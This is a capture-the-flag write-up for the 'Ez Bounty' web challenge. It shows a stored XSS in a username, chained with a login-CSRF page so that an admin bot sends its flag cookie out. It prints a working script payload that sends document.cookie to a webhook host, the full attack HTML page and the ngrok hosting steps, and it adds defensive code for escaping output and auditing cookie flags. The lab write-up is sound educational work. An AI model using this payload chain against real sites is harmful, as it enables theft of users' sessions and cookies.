# Ez Bounty – K!nd4SUS CTF 2026

K!nd4SUS CTF: <https://ctftime.org/event/3143/>

<table><thead><tr><th width="308.0902099609375">Field</th><th>Details</th></tr></thead><tbody><tr><td><strong>Challenge</strong></td><td>Ez Bounty</td></tr><tr><td><strong>Category</strong></td><td>Web Exploitation</td></tr><tr><td><strong>Type</strong></td><td>Stored XSS → Cookie Theft via Admin Bot</td></tr><tr><td><strong>Difficulty</strong></td><td>Easy–Medium</td></tr></tbody></table>

#### Description

I found a bug on this platform and reported it on HackerOne but they told me it was out of scope. Could you help me get my money?


#### Initial Analysis

After downloading the zip and reviewing `app.py`, three critical observations stood out:

#### 1. Admin Bot Sets a Readable Flag Cookie

```
await page.setCookie({
    "name": "flag",
    "value": FLAG,
    "httpOnly": False,   # ← JavaScript can read this!
    "sameSite": "None",
    "secure": True
})
```

**Critical Issue:**

* `httpOnly=False` → JavaScript can access `document.cookie`

#### 2. Session Misconfiguration

```
SESSION_COOKIE_HTTPONLY=False  # ← Session also stealable!
```

* Session cookies are also readable via JavaScript
* Increases impact of XSS

#### 3. Bot Visits User-Controlled URL

```
threading.Thread(target=run_bot, args=(url,)).start()
```

* We can submit any URL to the admin bot, giving us a vector to deliver our payload.

### Vulnerability Discovery

#### Step 1: HTML Injection

Registered with the username:

```
<b>l1nuxkid</b>
```


On the `/dashboard` page, the text rendered as **bold** instead of the literal string, confirming **HTML Injection**.

{% hint style="info" %}
HTML Injection → Stored XSS is possible.
{% endhint %}

#### Step 2: XSS Confirmation

Instead of inserting HTML, I attempted to register and log in using the payload below.

```
<img src=x onerror=alert(1)>
```


Voilà, the alert fired: **Stored XSS confirmed**. Any script in the username executes when the dashboard renders.

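The three findings from the initial analysis and the injection confirmed in Steps 1 and 2 share the same fixes: escape the username on output, and set `HttpOnly` and a restrictive `SameSite` on the cookies. The following stdlib-only Python is an added illustration of those fixes plus a `Set-Cookie` audit check; it is not the challenge's `app.py`, and the function names and the assumption that the dashboard interpolates the raw username are mine.

```python
# Added example: hardening for the Ez Bounty findings (not the challenge's own code).
import html
from http.cookies import SimpleCookie


def render_dashboard(username: str) -> str:
    """Escape the username before embedding it in HTML, which closes the stored XSS.
    Assumption: the real app interpolated the raw username into the dashboard page."""
    return f"<h1>Welcome, {html.escape(username, quote=True)}</h1>"


def build_cookie(name: str, value: str, *, http_only: bool = True,
                 same_site: str = "Lax", secure: bool = True) -> str:
    """Build a Set-Cookie header value. The defaults are the hardened settings the
    challenge lacked: HttpOnly on, SameSite=Lax instead of None, Secure on."""
    c = SimpleCookie()
    c[name] = value
    c[name]["httponly"] = http_only
    c[name]["secure"] = secure
    c[name]["samesite"] = same_site
    return c[name].OutputString()


def audit_set_cookie(header: str) -> list[str]:
    """Return the problems found in one Set-Cookie header value, as a check you
    could run over real responses in a test suite or an intercepting proxy."""
    attrs = {}
    for part in header.split(";")[1:]:
        k, _, v = part.strip().partition("=")
        attrs[k.lower()] = v
    problems = []
    if "httponly" not in attrs:
        problems.append("missing HttpOnly: document.cookie can read it")
    if "secure" not in attrs:
        problems.append("missing Secure")
    if attrs.get("samesite", "").lower() == "none":
        problems.append("SameSite=None: sent on cross-site requests")
    elif "samesite" not in attrs:
        problems.append("missing SameSite")
    return problems


if __name__ == "__main__":
    # Constructed inputs mirroring the writeup: the bold-tag username and the bot's flag cookie.
    print(render_dashboard("<b>l1nuxkid</b>"))
    weak = build_cookie("flag", "FLAG_PLACEHOLDER", http_only=False, same_site="None")
    print(weak, audit_set_cookie(weak))
    print(build_cookie("flag", "FLAG_PLACEHOLDER"), audit_set_cookie(build_cookie("flag", "FLAG_PLACEHOLDER")))
```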

### Exploitation Strategy

The attack chain:


#### Step 1: Create a Malicious Account

* Registered an account with the following XSS payload as the username:

```
<script>fetch('https://webhook.site/YOUR-ID?c='+document.cookie)</script>
```

Password: `lol`

This payload, once executed in the browser, sends all cookies on the app's domain to our webhook.

#### Step 2: Craft the Malicious Page

The bot holds the flag cookie on the app's domain, so JavaScript must run on that domain to read it. Our XSS payload is stored in our account's username, so we need the bot to be logged into our account and visit `/dashboard`.

#### Malicious Page (`index.html`)

```
<html>
<body>
  <form id="f" method="POST" action="https://chall.k1nd4sus.it:30510/login">
    <input name="username" value="&lt;script&gt;fetch('https://webhook.site/YOUR-ID?c='+document.cookie)&lt;/script&gt;">
    <input name="password" value="lol">
  </form>

  <script>
    fetch("https://chall.k1nd4sus.it:30510/logout", {
      credentials: "include",
      mode: "no-cors"
    })
    .then(() => document.getElementById("f").submit());
  </script>
</body>
</html>
```

**Breaking Down the Payload**

<table><thead><tr><th width="311.40625">Part</th><th>Purpose</th></tr></thead><tbody><tr><td><code>action="…/login"</code></td><td>Submits credentials to the app's login endpoint</td></tr><tr><td><code>&#x26;lt;script&#x26;gt;…&#x26;lt;/script&#x26;gt;</code></td><td>HTML-encoded XSS payload — browser decodes it before submitting, server matches it to our stored username</td></tr><tr><td><code>credentials: "include"</code></td><td>Sends the bot's admin session cookie with the logout request</td></tr><tr><td><code>mode: "no-cors"</code></td><td>We don't need the response — just need logout to complete</td></tr><tr><td><code>.then(() => …submit())</code></td><td>Ensures logout finishes <strong>before</strong> logging into attacker account</td></tr></tbody></table>

> **Why logout first?** If the bot is already logged in, `/login` just redirects to `/dashboard`, showing the admin's username, not ours. Logging out first ensures our attacker account gets loaded.

After successful login, the app redirects the bot to `/dashboard`, where our stored XSS username renders and the script executes.

#### Step 3: Host the Payload

* Hosted the malicious page locally:

```
python3 -m http.server 80
```

Expose it via ngrok (temporary tunnel):

```
ngrok http 80
```

Submit the ngrok URL to the bot at `/report`:

```
https://<your-ngrok-subdomain>.ngrok-free.app
```


### Result

The admin bot:

1. Visited our malicious page
2. Logged out of the admin account
3. Logged into our attacker account
4. Rendered `/dashboard` — XSS fired
5. Sent all cookies to our webhook

